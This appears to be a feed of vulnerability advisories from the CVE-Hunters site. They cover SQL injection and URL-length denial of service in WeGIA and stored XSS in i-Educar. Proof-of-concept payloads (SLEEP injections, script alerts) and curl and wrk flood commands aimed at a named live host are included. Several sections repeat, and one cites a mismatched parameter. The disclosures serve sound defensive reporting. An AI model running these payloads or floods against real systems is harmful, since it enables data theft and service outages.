<code>/controle/relatorio_geracao.php</code></p> <p>Parameters: <code>tipo</code> and <code>responsavel</code></p> <h2 id="poc">PoC </h2><h3 id="normal-request">Normal Request: </h3><p><img src="/p/cve-2025-53527/image.png" width="1772" height="846" srcset="/p/cve-2025-53527/image_hu_4ead4c411acbfc85.png 480w, /p/cve-2025-53527/image_hu_378d044d0498fc9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="502px" ></p><h2 id="cve-2025-53527-sql-injection-vulnerability-in-tipo-and-responsavel-parameters-on-relatorio_geracaophp-endpoint">CVE-2025-53527: SQL Injection Vulnerability in <code>tipo</code> and <code>responsavel</code> Parameters on <code>relatorio_geracao.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53527" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53527</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the <code>tipo</code> and <code>responsavel</code> parameters of the <code>/controle/relatorio_geracao.php</code> endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/controle/relatorio_geracao.php</code></p> <p>Parameters: <code>tipo</code> and <code>responsavel</code></p> <h2 id="poc">PoC </h2><h3 id="normal-request">Normal Request: </h3><p><img src="/p/cve-2025-53527/image.png" width="1772" height="846" srcset="/p/cve-2025-53527/image_hu_4ead4c411acbfc85.png 480w, /p/cve-2025-53527/image_hu_378d044d0498fc9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="502px" /></p> <h3 id="sql-injection-parameter-tipo">SQL Injection parameter <code>tipo</code> </h3><h4 id="payload">Payload: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> ;SELECT SLEEP(10)# </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53527/image-1.png" width="1772" height="844" srcset="/p/cve-2025-53527/image-1_hu_c53ce822599b86e2.png 480w, /p/cve-2025-53527/image-1_hu_d3264b015af14a6d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="503px" /></p> <h3 id="sql-injection-parameter-responsavel">SQL Injection parameter <code>responsavel</code> </h3><h4 id="payload-1">Payload: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> ;SELECT SLEEP(10)# </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53527/image-2.png" width="1771" height="848" srcset="/p/cve-2025-53527/image-2_hu_44bcaa97ca684007.png 480w, /p/cve-2025-53527/image-2_hu_5c23286a79e2c0ab.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="208" data-flex-basis="501px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.</li> <li>Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.</li> <li>Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.</li> <li>Reputational damage: Exposing customer data or business information can significantly harm the organization's image.</li> <li>Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43xw-c4g6-jgff" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43xw-c4g6-jgff</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53529/ https://www.cvehunters.com/p/cve-2025-53529/ <h2 id="cve-2025-53529-sql-injection-vulnerability-in-id_funcionario-parameter-on-profile_funcionariophp-endpoint">CVE-2025-53529: SQL Injection Vulnerability in <code>id_funcionario</code> Parameter on <code>profile_funcionario.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53529" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53529</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_funcionario</code> parameter of the <code>html/funcionario/profile_funcionario.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the almox parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-53529-sql-injection-vulnerability-in-id_funcionario-parameter-on-profile_funcionariophp-endpoint">CVE-2025-53529: SQL Injection Vulnerability in <code>id_funcionario</code> Parameter on <code>profile_funcionario.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53529" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53529</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_funcionario</code> parameter of the <code>html/funcionario/profile_funcionario.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the almox parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>html/funcionario/profile_funcionario.php</code></p> <p>Parameter: <code>id_funcionario</code></p> <p style="text-align: justify;"> <ul> <li>Navigate to: <a href="https://demo.wegia.org/html/funcionario/profile_funcionario.php id_funcionario=1" target="_blank">https://demo.wegia.org/html/funcionario/profile_funcionario.php id_funcionario=1</a>;</li> <li>Insert SQL command after <code>id</code> parameter like in the image below:</li> </ul> </p> <p><img src="/p/cve-2025-53529/image.png" width="1912" height="1073" srcset="/p/cve-2025-53529/image_hu_32a2f42d1fd543dd.png 480w, /p/cve-2025-53529/image_hu_e2f18ef0e93db18f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="178" data-flex-basis="427px" /></p> <p style="text-align: justify;">Observe the Fatal error: <code>Uncaught PDOException: SQLSTATE[HY000]: Cardinality violation: 1222 The used SELECT statements have a different number of columns</code> message, unequivocally confirming SQL Injection.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rrj6-pj6w-8j2r" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rrj6-pj6w-8j2r</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/pedro50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app" target="_blank" rel="noopener" >Pedro Lyrio</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53530/ https://www.cvehunters.com/p/cve-2025-53530/ <h2 id="cve-2025-53530-uncontrolled-resource-consumption-in-wegia-parameter-errorstr">CVE-2025-53530: Uncontrolled Resource Consumption in WeGIA parameter <code>errorstr</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53530" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53530</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the <code>errorstr</code> parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.</p><h2 id="cve-2025-53530-uncontrolled-resource-consumption-in-wegia-parameter-errorstr">CVE-2025-53530: Uncontrolled Resource Consumption in WeGIA parameter <code>errorstr</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53530" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53530</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the <code>errorstr</code> parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET https://comfirewall.wegia.org:8000/WeGIA?errorstr=AAAA...</code></p> <p style="text-align: justify;"> <ul> <li>The parameter <code>errorstr</code> in the URL allows attackers to add an arbitrary amount of data up to <b>8,142 characters.</b></li> <li>There is no validation for the length of the <code>errorstr</code> parameter processed by the server.</li> <li>During testing, the parameter was extended with repeated characters (<code>errorstr=-value-</code>), causing resource exhaustion, timeouts, and errors in socket connections.</li> </ul> </p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Steps to reproduce the issue: <ul> <li>Execute the following HTTP GET request to reproduce the issue:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> curl "https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c 'print("A"*8000)')" </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>To simulate a high-load attack, use the <code>wrk</code> tool:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> wrk -t12 -c400 -d60s "https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c 'print("A"*8000)')" </span></span></code></pre></td></tr></table> </div> </div><video width="100%" height="100%" controls> <source src="404392693-694ff24a-243a-429e-8225-b9de406355fc.mp4" type="video/mp4"> </video> <p style="text-align: justify;"><b>Updated Test Results with <code>wrk</code>:</b> <ul> <li><b>20,180 requests</b> were processed in 1 minute.</li> <li><b>719 timeouts</b> and <b>134 read errors</b> occurred, indicating the server struggled to respond to the load.</li> <li>Average latency was <b>249.77ms</b>, with peaks reaching <b>2 seconds</b>.</li> <li>The server attempted to handle the load but demonstrated significant resource exhaustion, confirming its vulnerability to DoS attacks.</li> </ul> </p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This is a Denial of Service vulnerability. Any unauthenticated user with access to tools like OWASP ZAP can exploit this issue to make the server unresponsive. This affects the availability of the application and could disrupt business operations. The lack of rate limiting and recursive crawling restrictions increases the risk and makes the vulnerability exploitable by low-skilled attackers.</p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela0x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53531/ https://www.cvehunters.com/p/cve-2025-53531/ <h2 id="cve-2025-53531-uncontrolled-resource-consumption-in-wegia-parameter-fid">CVE-2025-53531: Uncontrolled Resource Consumption in WeGIA parameter <code>fid</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53531" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53531</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the <code>fid</code> parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.</p><h2 id="cve-2025-53531-uncontrolled-resource-consumption-in-wegia-parameter-fid">CVE-2025-53531: Uncontrolled Resource Consumption in WeGIA parameter <code>fid</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53531" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53531</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the <code>fid</code> parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256&param1=AAAA&param2=BBBB&param3=CCCC...</code></p> <p style="text-align: justify;"> <ul> <li>The URL accepts parameters concatenated with <code>&</code>, allowing attackers to add an arbitrary amount of data up to <b>8,142 characters.</b></li> <li>There is no validation for the total URL length or the number of parameters processed by the server.</li> <li>During testing, the URL was extended with repeated parameters (<code>&param=-value-</code>), causing resource exhaustion and server instability.</li> </ul> </p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Steps to reproduce the issue: <ul> <li>Execute the following HTTP GET request to reproduce the issue:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> curl "https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256$(python3 -c 'print("&param=" + "X"*8000)')" </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>To simulate a high-load attack, use the <code>wrk</code> tool:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> wrk -t12 -c400 -d60s "https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256$(python3 -c 'print("&param=" + "X"*8000)')" </span></span></code></pre></td></tr></table> </div> </div><video width="100%" height="100%" controls> <source src="404374779-e8006b99-a94b-4407-a3d5-64fbeaf985f5.mp4" type="video/mp4"> </video> <p style="text-align: justify;"><b>Updated Test Results with <code>wrk</code>:</b> <ul> <li><b>Requests Processed:</b> 20,799 requests in 1 minute, with 330.90 MB read.</li> <li><b>Average Latency:</b> 280.91ms, peaking at 2 seconds.</li> <li><b>Errors:</b> 98 read errors and 591 timeouts occurred.</li> <li><b>Request Rate:</b> 346.07 requests/sec.</li> <li><b>Data Transfer:</b> 5.51 MB/sec.</li> </ul> </p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This is a Denial of Service vulnerability. Any unauthenticated user with access to tools like OWASP ZAP can exploit this issue to make the server unresponsive. This affects the availability of the application and could disrupt business operations. The lack of rate limiting and recursive crawling restrictions increases the risk and makes the vulnerability exploitable by low-skilled attackers.</p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela0x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7109/ https://www.cvehunters.com/p/cve-2025-7109/ <h2 id="cve-2025-7109-cross-site-scripting-xss-stored-endpoint-educar_aluno_beneficio_cadphp-parameter-benefício">CVE-2025-7109: Cross-Site Scripting (XSS) Stored endpoint <code>educar_aluno_beneficio_cad.php</code> parameter <code>Benefício</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7109" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7109</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_aluno_beneficio_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Benefício</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_aluno_beneficio_cad.php</code></p><h2 id="cve-2025-7109-cross-site-scripting-xss-stored-endpoint-educar_aluno_beneficio_cadphp-parameter-benefício">CVE-2025-7109: Cross-Site Scripting (XSS) Stored endpoint <code>educar_aluno_beneficio_cad.php</code> parameter <code>Benefício</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7109" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7109</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_aluno_beneficio_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Benefício</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_aluno_beneficio_cad.php</code></p> <p>Parameter: <code>Benefício</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Benefício</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB PacXXX'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7109/image.png" width="1875" height="1001" srcset="/p/cve-2025-7109/image_hu_ce7d7ad02b44b12.png 480w, /p/cve-2025-7109/image_hu_9a61a6d6d6449abc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p><img src="/p/cve-2025-7109/image-1.png" width="1889" height="997" srcset="/p/cve-2025-7109/image-1_hu_60a60555d7528d3a.png 480w, /p/cve-2025-7109/image-1_hu_1abeeb2b65e62c22.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="454px" /></p> <p><img src="/p/cve-2025-7109/image-2.png" width="1701" height="1013" srcset="/p/cve-2025-7109/image-2_hu_ee4aa3fddc8a48a5.png 480w, /p/cve-2025-7109/image-2_hu_eb7ac958f3edf421.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="167" data-flex-basis="403px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/Pe33X_zm_TQ" target="_blank" rel="noopener" >https://youtu.be/Pe33X_zm_TQ</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7109.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7109.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7110/ https://www.cvehunters.com/p/cve-2025-7110/ <h2 id="cve-2025-7110-cross-site-scripting-xss-stored-endpoint-educar_escola_lstphp-parameter-escola">CVE-2025-7110: Cross-Site Scripting (XSS) Stored endpoint <code>educar_escola_lst.php</code> parameter <code>Escola</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7110" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7110</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_escola_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Escola</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_escola_lst.php</code></p><h2 id="cve-2025-7110-cross-site-scripting-xss-stored-endpoint-educar_escola_lstphp-parameter-escola">CVE-2025-7110: Cross-Site Scripting (XSS) Stored endpoint <code>educar_escola_lst.php</code> parameter <code>Escola</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7110" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7110</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_escola_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Escola</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_escola_lst.php</code></p> <p>Parameter: <code>Escola</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Escola</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7110/image.png" width="1886" height="996" srcset="/p/cve-2025-7110/image_hu_b07da12df38ab222.png 480w, /p/cve-2025-7110/image_hu_ea38d215407e28e3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="454px" /></p> <p><img src="/p/cve-2025-7110/image-1.png" width="1805" height="970" srcset="/p/cve-2025-7110/image-1_hu_eba69eb637b93ae8.png 480w, /p/cve-2025-7110/image-1_hu_e69951c2ec55d9fb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="186" data-flex-basis="446px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/N3pu_GJHjCw" target="_blank" rel="noopener" >https://youtu.be/N3pu_GJHjCw</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its 